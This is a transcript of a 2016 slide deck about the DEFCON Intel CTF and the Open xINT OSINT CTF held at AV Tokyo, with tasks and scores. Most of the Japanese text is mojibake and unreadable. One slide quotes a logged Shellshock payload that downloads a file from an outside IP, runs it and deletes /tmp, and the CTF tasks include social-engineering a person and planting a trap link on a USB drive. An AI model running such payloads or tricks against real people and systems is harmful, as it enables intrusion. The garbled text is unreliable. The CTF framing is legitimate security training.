Intel CTF and Open xINT CTF 20161220

Transcript

1. OSINTͷCTFʹ ࢀՃͯ͠։࠵ͨ͠࿩Ͱʂ 2016/12/20 #ssmjp @YuhoKameda ɹɹɹɹɹɹɹɹɹ @pinja_xyz

2. ࣗݾ঺հ ُా ༐า : ykame (@YuhoKameda) ZAP Evangelist OSINT ओͳۀ຿಺༰

   WebΞϓϦέʔγϣϯ੬ऑੑ਍அ ϓϥοτϑΥʔϜ੬ऑੑ਍அ SOC/CSIRTۀ຿ ۓٸҊ݅ͳΜͰ΋ཁһ… ৘ใऩू

3. ࠓ೔࿩͢͜ͱ DEFCONͰIntel CTFʹࢀՃͨ͠࿩ AV TokyoͰOpen xINT CTFΛ։࠵ͨ͠࿩

4. DEFCONͰIntel CTFʹ ࢀՃͨ͠࿩

5. DEFCONͰIntel CTF DEFCONͬͯͳʔʹʁ ຖ೥ՆʹϥεϕΨεͰ։࠵ BlackHatʹଓ͚ͯ։࠵ ༷ʑͳCTF΍ίϯςετ͕͋ΔϋοΧʔ ͷࡇయ

6. DEFCONͰIntel CTF Intel CTFͬͯͳʔʹʁ 2015೥͔Β࢝·ͬͨɺIntelligenceʹয఺Λ౰ͯͨ ڝٕ ୈ2ճ(2016೥)ͷςʔϚ͸ɺੈքͷTop50ʹೖΔا ۀͷThreat Intelligence Analystͱͯ͠ɺ߈ܸऀΛ

   ௥੻͍ͯ͘͠աఔͰ༷ʑͳ໰୊Λճ౴͢Δ ༏উ৆ۚ͸$2,500 pinjaͰࢀՃʂ(@luminࢯɺ@awamori_ttࢯ + me) ݁Ռ͸12ҐͰͨ͠

7. Intel CTFͷ݁Ռ

8. ͲΜͳ໰୊͕͋ͬͨͷʔʁ 1໰໨ The Vuln: What is the vulnerability that was

   successfully exploited also "known" as? 4ϑΝΠϧܭ508ສߦͷApacheϩάͷத͔ Βɺ߈ܸʹ੒ޭͨ͠1ߦΛݟ͚ͭΔ XX.XX.XX.XX - - [21/Jul/2016:02:58:19 -0700] "GET /product/? id=2085 HTTP/1.0" 500 4958 "" "() { : ; }; /bin/bash -c 'wget -O / tmp/a.jpg http://52.37.125.215/ ; curl -o /tmp/a.jpg http:// 52.37.125.215/ ; tar -xzvf /tmp/a.jpg ; chmod 777 /tmp/* ; /tmp/a ; rm -rf /tmp/*'"

9. 1໰໨ͷ౴͑͸ʁ What is the vulnerability that was successfully exploited also

   "known" as? ͳ͔ͳ͔౴͕͑߹Θͳ͍… Shellshock? shellshock?

10. 1໰໨ͷ౴͑͸ʁ What is the vulnerability that was successfully exploited also

    "known" as? ͳ͔ͳ͔౴͕͑߹Θͳ͍… Shellshock? shellshock? Bashbug? CVE-2014-6271?

11. 1໰໨ͷ౴͑͸ʁ What is the vulnerability that was successfully exploited also

    "known" as? ͳ͔ͳ͔౴͕͑߹Θͳ͍… Shellshock? shellshock? Bashbug? CVE-2014-6271? ౴͑͸ʮBashdoorʯ

12. ͦͷଞͷ໰୊ <Level1> Ϛϧ΢ΣΞͷ௨৴ઌ͸ʁ ߈ܸݩIPͷASN(Autonomous System Number)͸ʁ ߈ܸݩIP͕ެ։͍ͯ͠ΔWebαʔόͷόʔδϣϯ͸ʁ <Level2> Ϛϧ΢ΣΞͷ໊લ͸ʁ ࢖༻͕ແޮԽ͞Ε͍ͯΔؔ਺໊͸ʁ

    Ϙοτͷ໊લ͸ʁ Bot Harder͕࢖༻Δ͢ΔMaildrop͸ʁ

13. ଞʹ΋͋ΔSocial Engineering CTF(SECTF) ࣮ࡍͷاۀ΁ి࿩ͯ͠৘ใࡡऔ͢Δڝٕ Black Badge΋໯͑Δ໨ۄίϯςετ blog.yka.me Ͱɺ2015೥ͷ৘ใΛupͯ͠·͢ http://blog.yka.me/2015/08/social-engineering-ctfsectf-defcon-23.html

14. AV TokyoͰOpen xINT CTFΛ ։࠵ͨ͠࿩

15. AV Tokyoͬͯͳʔʹʁ ηΩϡϦςΟք۾ͷਓ͕ɺू·ͬͯҿΜ ͰɺൃදΛฉ͍ͯҿΜͰɺҿΉ ϋοΧʔίϛϡχςΟ no drink! no hack!

16. Ԡื·ͰͷྲྀΕ 8/6 20:00 ʮOSINTؔ܎ͷCTF͸೔ຊͰ΋΍Γ͍ͨͰ͢Ͷʯ ʮձࣾؔ܎ͩͱ಺༰͕… AVTokyoͷCFxͱ͔Ͳ͏Ͱ͠ΐ͏ʯ ʮʒ੾(8/15)͍ۙͰ͢Ͷɺམͪண͍ͨΒग़͠·͠ΐ͏͔ʯ 8/7 10:00 ɹɹʙ16:00

    Intel CTFڝٕࢀՃ 8/8 13:19 writeupΛڞ༗ 8/8 22:26 Call For Xͷจষୟ͖୆ 8/12 Call For Xఏग़done

17. ࣮ࡍʹ։࠵ͯ͠Έͨ 10/22 15:00 - 19:30 @ौ୩

18. Open xINT CTFͱ͸ʁ http://xintctf.wpblog.jp/ ձ৔Ͱͷؔ܎ऀ΁ͷฉ͖ࠐΈ΍SNSͳͲͰඞཁͳ৘ใΛऩ ू͠ɺ࣍ʑ໌Β͔ʹͳΔώϯτΛղ͖ͳ͕ΒຊؙʹͨͲΓ ண͘ɺݱ୅ͷεύΠཆ੒ίϯςετ ࢀՃऀ(εύΠ) ߈ܸऀΛௐࠪ (ผͷεύΠ)

    ߈ܸऀ(ϋοΧʔ) ઀৮ USB୳ࡧґཔ USBʹ᠘Λ࢓ࠐΜͰ઀৮ ಠࣗʹௐࠪ

19. ໰୊͸7໰ 1. pinja.xyzͷ։ઃऀ(߈ܸऀ)ͷϝʔϧΞυϨε͸ʁ 2. ߈ܸऀ͕ॴ༗͢ΔFacebookΞΧ΢ϯτ͸ʁ 3. ߈ܸऀཱ͕ͪدͬͨ(ࣸਅ)ҿ৯ళͷ࠲ඪ͸ʁ 4. ߈ܸऀͱҰॹʹ৯ࣄ͍ͯ͠Δਓ(εύΠ)ͷFacebookΞΧ΢ϯτ ͸ʁ

    5. ͜ͷਓ(εύΠ)Λࣸਅ͔Βಛఆ͠ɺAV Tokyo಺Ͱ઀৮ͯ͠ʮ͏· ͘৴༻ͤͯ͞ʯ৘ใΛҾ͖ग़ͤ 6. εύΠ͔ΒҾ͖ग़ͨ͠৘ใΛݩʹɺʮϞϊʯΛݟ͚ͭɺಘΒΕΔ ৘ใΛݟ͚ͭΖ 7. ͦͷϞϊʹ᠘ϦϯΫΛ࢓ֻ͚ɺʮෆ৹ʹࢥΘΕͳ͍Α͏ʯ߈ܸऀ ʹAV Tokyo಺ͰʮϞϊʯΛ౉ͤ

20. ͋ΔʮϞϊʯ(USB)Λ୳ͯ͘͠Δ MAMORIOΞϓϦͰ൓ԠνΣοΫ http://www.mamorio.jp/ ΞϓϦͰ൓Ԡͷ͋ͬͨ෇ۙΛ୳͢

21. ৄ͘͠͸ࢀՃऀͷwriteupΛʂ ΤΫετϦʔϜCTF͸ͭΒ͍ʢOpen xINT ͷWriteup?ʣ http://pinksawtooth.hatenablog.com/ entry/2016/10/24/010049 Open xINT CTF Writeup

    http://qiita.com/nicklegr/items/ 5ebcdaac86a21613c94a

22. ࢀՃऀ਺ : 93ਓ 1໰Ͱ΋ղ͚ͨਓ : 67ਓճ౴෼෍ 1: 67ਓɺ2: 49ਓɺ3: 8ਓɺ4:

    28ਓɺ5: 7ਓ

23. ࠷ऴతͳ݁Ռ͸ʁ (700఺Ҏ্) [߹ܭ఺਺ + εύΠಘ఺ + ࠷ऴճ౴࣌ؒ] Sh1n0g1ɹ900 +ʢ100ʣ18:45:56 tigerszkɹ900

    +ʢ100ʣ 19:20:49 rcsirtɹ900 +ʢ0ʣ17:16:36 nicklegrɹ700 +ʢ200ʣ17:39:52 brightblueɹ900 +ʢ0ʣ19:25:33 TomoriNaoɹ700 +ʢ100ʣ17:20:22 tonko2ɹ600 +ʢ100ʣ17:11:11 Sakura Ayaneɹ700 +ʢ0ʣ17:31:46 ໊લ͕ొ࿥໊ͱҰக͠ͳ͍ํ͸εύΠಘ఺͕0఺ͱͳΓ·͢ ಉ఺ͷ৔߹ɺ࠷ऴճ౴͕࣌ؒૣ͍ํ্͕Ґͱ͠·͢